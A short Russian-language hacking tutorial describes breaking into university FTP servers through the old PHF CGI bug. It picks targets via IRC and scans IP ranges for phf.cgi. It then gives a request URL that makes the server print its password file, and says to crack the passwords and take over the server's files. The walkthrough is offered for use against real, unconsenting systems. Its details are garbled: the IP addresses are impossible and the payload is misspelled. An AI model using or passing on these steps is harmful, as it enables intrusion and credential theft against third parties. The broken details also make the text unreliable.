Взлом FTP-узла
Для взлома используется обычный cgi скрипт, а точнее ошибка в нём, так называемый PHF BUG. С 1996 года (именно тогда этот баг обнаружили) почти ни один FTP узел не пофиксил эту конетель. Ну и осталась эта дыра до сих пор.

1. Врубаем IRC клиент и коннектимся к любому серваку.

Обычно самые протухшие и заплесневевшие админы водятся на больших университетских серваках типа ***.edu.

2. Вводим в нашем клиенте /who*.edu (где * - имя универа).

Перед нами должен появиться список юзающих этот сервер людей.

3. Выбираем любого, например vasya-pupkin@lamer.lox.otstoy.edu.

4. Пишем в клиенте /dns vasya-pupkin Этим мы узнаём его IP. Например 123.457.841.3.

5. Дальше берём прогу Grinder. Она позволяет найти любой файл в заданном диапазоне IP.

6. Запускаем прогу и ищём /cgi.bin/phf.cgi в диапазоне <123.457.841.0 - 123.457.841.256>.

Если прога выдала URL FOUND, тогда.

7. Запоминаем IP, где был найден этот кусок скрипта..

допустим это 123.457.841.43,.

8. Открываем браузер и пишем:
http://123.457.841.43/cgi-bin/phf?Qalias=%off/bin/cat%20/etc/password.

И если всё сделано правильно, то перед нами должен появиться файл с паролями всех юзеров..

9. Сохраняем на винт..

10. Качаем взломщик паролей Юникс..

11. Ломаем. И уже под этим логином и паролем входим на FTP сервер этого универа..

Перед тобой ВСЁ файлы университета. Делай с ними что хочешь .